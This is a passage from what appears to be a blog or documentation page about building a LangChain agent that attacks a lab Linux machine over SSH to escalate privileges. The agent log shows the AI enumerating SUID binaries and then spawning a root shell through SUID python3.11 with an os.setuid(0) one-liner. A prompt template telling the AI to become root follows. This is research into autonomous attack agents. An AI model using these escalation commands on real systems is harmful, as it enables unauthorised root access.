</span><span id="__span-12-24"><a id="__codelineno-12-24" name="__codelineno-12-24" href="#__codelineno-12-24"></a>
</span><span id="__span-12-25"><a id="__codelineno-12-25" name="__codelineno-12-25" href="#__codelineno-12-25"></a><span class="m">7</span>.<span class="w"> </span>**Kernel<span class="w"> </span>Exploits**:<span class="w"> </span>If<span class="w"> </span>the<span class="w"> </span>kernel<span class="w"> </span>is<span class="w"> </span>outdated,<span class="w"> </span>check<span class="w"> </span><span class="k">for</span><span class="w"> </span>any<span class="w"> </span>known<span class="w"> </span>exploits<span class="w"> </span>that<span class="w"> </span>can<span class="w"> </span>be<span class="w"> </span>used<span class="w"> </span>to<span class="w"> </span>gain<span class="w"> </span>root<span class="w"> </span>access.
</span><span id="__span-12-26"><a id="__codelineno-12-26" name="__codelineno-12-26" href="#__codelineno-12-26"></a>
</span><span id="__span-12-27"><a id="__codelineno-12-27" name="__codelineno-12-27" href="#__codelineno-12-27"></a>Let<span class="s1">&#39;s start with the enumeration phase by executing some commands to gather information about the system. I&#39;</span>ll<span class="w"> </span>run<span class="w"> </span>the<span class="w"> </span>following<span class="w"> </span>commands:
</span><span id="__span-12-28"><a id="__codelineno-12-28" name="__codelineno-12-28" href="#__codelineno-12-28"></a>
</span><span id="__span-12-29"><a id="__codelineno-12-29" name="__codelineno-12-29" href="#__codelineno-12-29"></a>-<span class="w"> </span><span class="sb">`</span>uname<span class="w"> </span>-a<span class="sb">`</span><span class="w"> </span>to<span class="w"> </span>get<span class="w"> </span>the<span class="w"> </span>kernel<span class="w"> </span>version<span class="w"> </span>and<span class="w"> </span>system<span class="w"> </span>architecture.
</span><span id="__span-12-30"><a id="__codelineno-12-30" name="__codelineno-12-30" href="#__codelineno-12-30"></a>-<span class="w"> </span><span class="sb">`</span>id<span class="sb">`</span><span class="w"> </span>to<span class="w"> </span>check<span class="w"> </span>the<span class="w"> </span>current<span class="w"> </span>user<span class="s1">&#39;s privileges and group memberships.</span>
</span><span id="__span-12-31"><a id="__codelineno-12-31" name="__codelineno-12-31" href="#__codelineno-12-31"></a><span class="s1">- `find / -perm -4000 2&gt;/dev/null` to list SUID binaries.</span>
</span><span id="__span-12-32"><a id="__codelineno-12-32" name="__codelineno-12-32" href="#__codelineno-12-32"></a><span class="s1">- `find / -perm -2000 2&gt;/dev/null` to list SGID binaries.</span>
</span><span id="__span-12-33"><a id="__codelineno-12-33" name="__codelineno-12-33" href="#__codelineno-12-33"></a><span class="s1">- `find / -writable -type d 2&gt;/dev/null` to find world-writable directories.</span>
</span><span id="__span-12-34"><a id="__codelineno-12-34" name="__codelineno-12-34" href="#__codelineno-12-34"></a><span class="s1">- `crontab -l` to list the current user&#39;</span>s<span class="w"> </span>cron<span class="w"> </span>jobs.
</span><span id="__span-12-35"><a id="__codelineno-12-35" name="__codelineno-12-35" href="#__codelineno-12-35"></a>-<span class="w"> </span><span class="sb">`</span>cat<span class="w"> </span>/etc/crontab<span class="sb">`</span><span class="w"> </span>to<span class="w"> </span>view<span class="w"> </span>system-wide<span class="w"> </span>cron<span class="w"> </span>jobs.
</span><span id="__span-12-36"><a id="__codelineno-12-36" name="__codelineno-12-36" href="#__codelineno-12-36"></a>
</span><span id="__span-12-37"><a id="__codelineno-12-37" name="__codelineno-12-37" href="#__codelineno-12-37"></a>
</span><span id="__span-12-38"><a id="__codelineno-12-38" name="__codelineno-12-38" href="#__codelineno-12-38"></a>cmd<span class="w"> </span>executed:<span class="w"> </span>find<span class="w"> </span>/<span class="w"> </span>-perm<span class="w"> </span>-2000<span class="w"> </span><span class="m">2</span>&gt;/dev/null
</span><span id="__span-12-39"><a id="__codelineno-12-39" name="__codelineno-12-39" href="#__codelineno-12-39"></a>result:<span class="w">  </span>/var/mail
</span><span id="__span-12-40"><a id="__codelineno-12-40" name="__codelineno-12-40" href="#__codelineno-12-40"></a>/var/local
</span><span id="__span-12-41"><a id="__codelineno-12-41" name="__codelineno-12-41" href="#__codelineno-12-41"></a>/var/log/journal
</span><span id="__span-12-42"><a id="__codelineno-12-42" name="__codelineno-12-42" href="#__codelineno-12-42"></a>/var/log/journal/c9c36c71f63f41ba8d4b51f857984e51
</span><span id="__span-12-43"><a id="__codelineno-12-43" name="__codelineno-12-43" href="#__codelineno-12-43"></a>/run/log/journal
</span><span id="__span-12-44"><a id="__codelineno-12-44" name="__codelineno-12-44" href="#__codelineno-12-44"></a>/usr/bin/crontab
</span><span id="__span-12-45"><a id="__codelineno-12-45" name="__codelineno-12-45" href="#__codelineno-12-45"></a>/usr/bin/chage
</span><span id="__span-12-46"><a id="__codelineno-12-46" name="__codelineno-12-46" href="#__codelineno-12-46"></a>/usr/bin/dotlockfile
</span><span id="__span-12-47"><a id="__codelineno-12-47" name="__codelineno-12-47" href="#__codelineno-12-47"></a>/usr/bin/expiry
</span><span id="__span-12-48"><a id="__codelineno-12-48" name="__codelineno-12-48" href="#__codelineno-12-48"></a>/usr/bin/ssh-agent
</span><span id="__span-12-49"><a id="__codelineno-12-49" name="__codelineno-12-49" href="#__codelineno-12-49"></a>/usr/sbin/unix_chkpwd
</span><span id="__span-12-50"><a id="__codelineno-12-50" name="__codelineno-12-50" href="#__codelineno-12-50"></a>
</span><span id="__span-12-51"><a id="__codelineno-12-51" name="__codelineno-12-51" href="#__codelineno-12-51"></a>cmd<span class="w"> </span>executed:<span class="w"> </span>find<span class="w"> </span>/<span class="w"> </span>-perm<span class="w"> </span>-4000<span class="w"> </span><span class="m">2</span>&gt;/dev/null
</span><span id="__span-12-52"><a id="__codelineno-12-52" name="__codelineno-12-52" href="#__codelineno-12-52"></a>result:<span class="w">  </span>/usr/bin/newgrp
</span><span id="__span-12-53"><a id="__codelineno-12-53" name="__codelineno-12-53" href="#__codelineno-12-53"></a>/usr/bin/gpasswd
</span><span id="__span-12-54"><a id="__codelineno-12-54" name="__codelineno-12-54" href="#__codelineno-12-54"></a>/usr/bin/su
</span><span id="__span-12-55"><a id="__codelineno-12-55" name="__codelineno-12-55" href="#__codelineno-12-55"></a>/usr/bin/find
</span><span id="__span-12-56"><a id="__codelineno-12-56" name="__codelineno-12-56" href="#__codelineno-12-56"></a>/usr/bin/chfn
</span><span id="__span-12-57"><a id="__codelineno-12-57" name="__codelineno-12-57" href="#__codelineno-12-57"></a>/usr/bin/passwd
</span><span id="__span-12-58"><a id="__codelineno-12-58" name="__codelineno-12-58" href="#__codelineno-12-58"></a>/usr/bin/python3.11
</span><span id="__span-12-59"><a id="__codelineno-12-59" name="__codelineno-12-59" href="#__codelineno-12-59"></a>/usr/bin/chsh
</span><span id="__span-12-60"><a id="__codelineno-12-60" name="__codelineno-12-60" href="#__codelineno-12-60"></a>/usr/bin/umount
</span><span id="__span-12-61"><a id="__codelineno-12-61" name="__codelineno-12-61" href="#__codelineno-12-61"></a>/usr/bin/sudo
</span><span id="__span-12-62"><a id="__codelineno-12-62" name="__codelineno-12-62" href="#__codelineno-12-62"></a>/usr/bin/mount
</span><span id="__span-12-63"><a id="__codelineno-12-63" name="__codelineno-12-63" href="#__codelineno-12-63"></a>/usr/lib/dbus-1.0/dbus-daemon-launch-helper
</span><span id="__span-12-64"><a id="__codelineno-12-64" name="__codelineno-12-64" href="#__codelineno-12-64"></a>/usr/lib/openssh/ssh-keysign
</span><span id="__span-12-65"><a id="__codelineno-12-65" name="__codelineno-12-65" href="#__codelineno-12-65"></a>
</span><span id="__span-12-66"><a id="__codelineno-12-66" name="__codelineno-12-66" href="#__codelineno-12-66"></a><span class="o">==================================</span><span class="w"> </span>Ai<span class="w"> </span><span class="nv">Message</span><span class="w"> </span><span class="o">==================================</span>
</span><span id="__span-12-67"><a id="__codelineno-12-67" name="__codelineno-12-67" href="#__codelineno-12-67"></a>
</span><span id="__span-12-68"><a id="__codelineno-12-68" name="__codelineno-12-68" href="#__codelineno-12-68"></a>Based<span class="w"> </span>on<span class="w"> </span>the<span class="w"> </span>enumeration<span class="w"> </span>results,<span class="w"> </span>here<span class="s1">&#39;s what we have found:</span>
</span><span id="__span-12-69"><a id="__codelineno-12-69" name="__codelineno-12-69" href="#__codelineno-12-69"></a>
</span><span id="__span-12-70"><a id="__codelineno-12-70" name="__codelineno-12-70" href="#__codelineno-12-70"></a><span class="s1">1. **System Information**: The system is running Linux kernel version 6.1.0-26-amd64 on a Debian-based distribution.</span>
</span><span id="__span-12-71"><a id="__codelineno-12-71" name="__codelineno-12-71" href="#__codelineno-12-71"></a>
</span><span id="__span-12-72"><a id="__codelineno-12-72" name="__codelineno-12-72" href="#__codelineno-12-72"></a><span class="s1">2. **User Information**: The current user is `lowpriv` with UID 1001 and GID 1001, and is not part of any special groups.</span>
</span><span id="__span-12-73"><a id="__codelineno-12-73" name="__codelineno-12-73" href="#__codelineno-12-73"></a>
</span><span id="__span-12-74"><a id="__codelineno-12-74" name="__codelineno-12-74" href="#__codelineno-12-74"></a><span class="s1">3. **SUID Binaries**: There are several SUID binaries, including `/usr/bin/find`, `/usr/bin/sudo`, and `/usr/bin/python3.11`. These can potentially be exploited for privilege escalation.</span>
</span><span id="__span-12-75"><a id="__codelineno-12-75" name="__codelineno-12-75" href="#__codelineno-12-75"></a>
</span><span id="__span-12-76"><a id="__codelineno-12-76" name="__codelineno-12-76" href="#__codelineno-12-76"></a><span class="s1">4. **SGID Binaries**: There are several SGID binaries, but none immediately stand out as exploitable without further context.</span>
</span><span id="__span-12-77"><a id="__codelineno-12-77" name="__codelineno-12-77" href="#__codelineno-12-77"></a>
</span><span id="__span-12-78"><a id="__codelineno-12-78" name="__codelineno-12-78" href="#__codelineno-12-78"></a><span class="s1">5. **World-Writable Directories**: There are several world-writable directories, including `/var/tmp` and `/tmp`, which could be used for temporary file manipulation attacks.</span>
</span><span id="__span-12-79"><a id="__codelineno-12-79" name="__codelineno-12-79" href="#__codelineno-12-79"></a>
</span><span id="__span-12-80"><a id="__codelineno-12-80" name="__codelineno-12-80" href="#__codelineno-12-80"></a><span class="s1">6. **Cron Jobs**: There are no user-specific cron jobs for `lowpriv`, but there are system-wide cron jobs executed by the root user.</span>
</span><span id="__span-12-81"><a id="__codelineno-12-81" name="__codelineno-12-81" href="#__codelineno-12-81"></a>
</span><span id="__span-12-82"><a id="__codelineno-12-82" name="__codelineno-12-82" href="#__codelineno-12-82"></a><span class="s1">### Potential Exploitation Path</span>
</span><span id="__span-12-83"><a id="__codelineno-12-83" name="__codelineno-12-83" href="#__codelineno-12-83"></a>
</span><span id="__span-12-84"><a id="__codelineno-12-84" name="__codelineno-12-84" href="#__codelineno-12-84"></a><span class="s1">The presence of the SUID bit on `/usr/bin/python3.11` is particularly interesting. Python can be used to execute commands, and if it retains the SUID privileges, it might allow us to execute commands as the root user.</span>
</span><span id="__span-12-85"><a id="__codelineno-12-85" name="__codelineno-12-85" href="#__codelineno-12-85"></a>
</span><span id="__span-12-86"><a id="__codelineno-12-86" name="__codelineno-12-86" href="#__codelineno-12-86"></a><span class="s1">Let&#39;</span>s<span class="w"> </span>attempt<span class="w"> </span>to<span class="w"> </span>exploit<span class="w"> </span>the<span class="w"> </span>SUID<span class="w"> </span>bit<span class="w"> </span>on<span class="w"> </span>Python<span class="w"> </span>to<span class="w"> </span>gain<span class="w"> </span>root<span class="w"> </span>access.<span class="w"> </span>We<span class="s1">&#39;ll use the following command to spawn a root shell:</span>
</span><span id="__span-12-87"><a id="__codelineno-12-87" name="__codelineno-12-87" href="#__codelineno-12-87"></a>
</span><span id="__span-12-88"><a id="__codelineno-12-88" name="__codelineno-12-88" href="#__codelineno-12-88"></a><span class="s1">/usr/bin/python3.11 -c &#39;</span>import<span class="w"> </span>os<span class="p">;</span><span class="w"> </span>os.setuid<span class="o">(</span><span class="m">0</span><span class="o">)</span><span class="p">;</span><span class="w"> </span>os.system<span class="o">(</span><span class="s2">&quot;/bin/sh&quot;</span><span class="o">)</span><span class="s1">&#39;</span>
</span><span id="__span-12-89"><a id="__codelineno-12-89" name="__codelineno-12-89" href="#__codelineno-12-89"></a>
</span><span id="__span-12-90"><a id="__codelineno-12-90" name="__codelineno-12-90" href="#__codelineno-12-90"></a><span class="s1">I&#39;</span>ll<span class="w"> </span>execute<span class="w"> </span>this<span class="w"> </span><span class="nb">command</span><span class="w"> </span>on<span class="w"> </span>the<span class="w"> </span>remote<span class="w"> </span>system.
</span><span id="__span-12-91"><a id="__codelineno-12-91" name="__codelineno-12-91" href="#__codelineno-12-91"></a>Tool<span class="w"> </span>Calls:
</span><span id="__span-12-92"><a id="__codelineno-12-92" name="__codelineno-12-92" href="#__codelineno-12-92"></a><span class="w">  </span>ssh_execute_command<span class="w"> </span><span class="o">(</span>call_zOm9FJFanxtnXxZpxzb8Y6UR<span class="o">)</span>
</span><span id="__span-12-93"><a id="__codelineno-12-93" name="__codelineno-12-93" href="#__codelineno-12-93"></a><span class="w"> </span>Call<span class="w"> </span>ID:<span class="w"> </span>call_zOm9FJFanxtnXxZpxzb8Y6UR
</span><span id="__span-12-94"><a id="__codelineno-12-94" name="__codelineno-12-94" href="#__codelineno-12-94"></a><span class="w">  </span>Args:
</span><span id="__span-12-95"><a id="__codelineno-12-95" name="__codelineno-12-95" href="#__codelineno-12-95"></a><span class="w">    </span>command:<span class="w"> </span>/usr/bin/python3.11<span class="w"> </span>-c<span class="w"> </span><span class="s1">&#39;import os; os.setuid(0); os.system(&quot;/bin/sh&quot;)&#39;</span>
</span><span id="__span-12-96"><a id="__codelineno-12-96" name="__codelineno-12-96" href="#__codelineno-12-96"></a>TIMEOUT!<span class="w"> </span>Could<span class="w"> </span>we<span class="w"> </span>have<span class="w"> </span>become<span class="w"> </span>root?
</span><span id="__span-12-97"><a id="__codelineno-12-97" name="__codelineno-12-97" href="#__codelineno-12-97"></a>cmd<span class="w"> </span>executed:<span class="w"> </span>/usr/bin/python3.11<span class="w"> </span>-c<span class="w"> </span><span class="s1">&#39;import os; os.setuid(0); os.system(&quot;/bin/sh&quot;)&#39;</span>
</span><span id="__span-12-98"><a id="__codelineno-12-98" name="__codelineno-12-98" href="#__codelineno-12-98"></a>result:<span class="w">  </span><span class="c1"># </span>
</span><span id="__span-12-99"><a id="__codelineno-12-99" name="__codelineno-12-99" href="#__codelineno-12-99"></a><span class="o">=================================</span><span class="w"> </span>Tool<span class="w"> </span><span class="nv">Message</span><span class="w"> </span><span class="o">=================================</span>
</span><span id="__span-12-100"><a id="__codelineno-12-100" name="__codelineno-12-100" href="#__codelineno-12-100"></a>Name:<span class="w"> </span>ssh_execute_command
</span><span id="__span-12-101"><a id="__codelineno-12-101" name="__codelineno-12-101" href="#__codelineno-12-101"></a>
</span><span id="__span-12-102"><a id="__codelineno-12-102" name="__codelineno-12-102" href="#__codelineno-12-102"></a><span class="c1"># </span>
</span><span id="__span-12-103"><a id="__codelineno-12-103" name="__codelineno-12-103" href="#__codelineno-12-103"></a><span class="o">==================================</span><span class="w"> </span>Ai<span class="w"> </span><span class="nv">Message</span><span class="w"> </span><span class="o">==================================</span>
</span><span id="__span-12-104"><a id="__codelineno-12-104" name="__codelineno-12-104" href="#__codelineno-12-104"></a>
</span><span id="__span-12-105"><a id="__codelineno-12-105" name="__codelineno-12-105" href="#__codelineno-12-105"></a>I<span class="w"> </span>successfully<span class="w"> </span>gained<span class="w"> </span>root<span class="w"> </span>access<span class="w"> </span>by<span class="w"> </span>exploiting<span class="w"> </span>the<span class="w"> </span>SUID<span class="w"> </span>bit<span class="w"> </span>on<span class="w"> </span><span class="sb">`</span>/usr/bin/python3.11<span class="sb">`</span>.<span class="w"> </span>By<span class="w"> </span>using<span class="w"> </span>Python<span class="err">&#39;</span>s<span class="w"> </span>ability<span class="w"> </span>to<span class="w"> </span>execute<span class="w"> </span>system<span class="w"> </span>commands<span class="w"> </span>and<span class="w"> </span>setting<span class="w"> </span>the<span class="w"> </span>user<span class="w"> </span>ID<span class="w"> </span>to<span class="w"> </span><span class="m">0</span><span class="w"> </span><span class="o">(</span>root<span class="o">)</span>,<span class="w"> </span>I<span class="w"> </span>was<span class="w"> </span>able<span class="w"> </span>to<span class="w"> </span>spawn<span class="w"> </span>a<span class="w"> </span>root<span class="w"> </span>shell.<span class="w"> </span>This<span class="w"> </span>method<span class="w"> </span>allowed<span class="w"> </span>me<span class="w"> </span>to<span class="w"> </span>escalate<span class="w"> </span>privileges<span class="w"> </span>from<span class="w"> </span>the<span class="w"> </span>low-privilege<span class="w"> </span>user<span class="w"> </span><span class="sb">`</span>lowpriv<span class="sb">`</span><span class="w"> </span>to<span class="w"> </span>the<span class="w"> </span>root<span class="w"> </span>user.
</span></code></pre></div>
<p>I find this fairly impressive..</p>
<h2 id="next-steps-and-todos">Next Steps and TODOs</h2>
<p>There are some things that need to be cleaned up.</p>
<p>switch from the <code>@tool</code>-annotation to the <code>BaseModel</code> base-class to allow tool configuration. We want to setup the SSH-connection (hostname, username, password) in the beginning and not hard-code it within our code. This will also clean-up our configuration handling.</p>
<p>The <code>langchain</code> library itself offers simple templating (<a href="https://api.python.langchain.com/en/latest/prompts/langchain_core.prompts.prompt.PromptTemplate.html">PromptTemplate</a>) thus making using a seperate <code>mako</code> template engine superficious. Sometime after I wrote this documention, I replaced the mako template with:</p>
<div class="language-python highlight"><pre><span></span><code><span id="__span-13-1"><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="n">template</span> <span class="o">=</span> <span class="n">PromptTemplate</span><span class="o">.</span><span class="n">from_template</span><span class="p">(</span><span class="s2">&quot;&quot;&quot;</span>
</span><span id="__span-13-2"><a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="s2">You are a low-privilege user </span><span class="si">{username}</span><span class="s2"> with password </span><span class="si">{password}</span><span class="s2"> on a linux system and your goal is to become the root user by executing commands on the remote system.</span>
</span><span id="__span-13-3"><a id="__codelineno-13-3" name="__codelineno-13-3" href="#__codelineno-13-3"></a>
</span><span id="__span-13-4"><a id="__codelineno-13-4" name="__codelineno-13-4" href="#__codelineno-13-4"></a><span class="s2">Do not repeat already tried escalation attacks. You should focus upon enumeration and privilege escalation. If you were able to become root, describe the used method as final message.</span>
</span><span id="__span-13-5"><a id="__codelineno-13-5" name="__codelineno-13-5" href="#__codelineno-13-5"></a><span class="s2">&quot;&quot;&quot;</span><span class="p">)</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">username</span><span class="o">=</span><span class="n">conn</span><span class="o">.</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="n">conn</span><span class="o">.</span><span class="n">password</span><span class="p">)</span>
</span></code></pre></div>







  
  



  


  



      
    </article>
  </div>

          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
          <button type="button" class="md-top md-icon" data-md-component="top" hidden>
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
  Back to top
</button>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    <script id="__config" type="application/json">{"base": "../../../../..", "features": ["content.code.annotation", "content.code.copy", "navigation.expand", "navigation.instant.preview", "navigation.path", "navigation.top", "navigation.tracking", "search.highlight", "search.suggest", "toc.follow"], "search": "../../../../../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
    
    
      <script src="../../../../../assets/javascripts/bundle.83f73b43.min.js"></script>
      
    
  </body>
</html>